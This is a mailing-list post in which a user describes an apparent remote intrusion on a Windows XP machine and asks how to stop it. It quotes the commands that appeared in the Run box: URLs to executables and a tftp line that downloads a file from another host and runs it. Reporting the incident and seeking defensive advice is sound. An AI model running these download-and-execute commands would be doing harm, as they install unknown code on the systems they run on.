Today, as I was sitting at my WINXP machine working, the START/Run window popped open and some unknown force typed the following:

http://homepage.my-place.us/system.exe

Well, I immediately disabled the network connection and I don't think this program was executed.

Then I scrolled through the Run window and found the following 3 lines:

cmd /c tftp -i 10.0.6.28 GET wfudpgemr.exe &wfudpgemr.exe &exit
http://kruma.us/vn.exe  
%SYSTEMROOT%\SYSTEM32\CMD.EXE

This really surprised me since I've taken a lot of measures to secure my system including a program that won't let new programs run without my permission.   This is why the first one didn't run.  I also run antivirus, I monitor the router/firewall with Wallwatcher, and I block all inbound ports except a couple (Skype, FreeVNC).

Anybody know anything about any of these apparent attacks.  Any suggestions to prevent this particular exploit (START/Run)?

Thanks,
Carey
-- 
http://www.piclist.com PIC/SX FAQ & list archive
View/change your membership options at
http://mailman.mit.edu/mailman/listinfo/piclist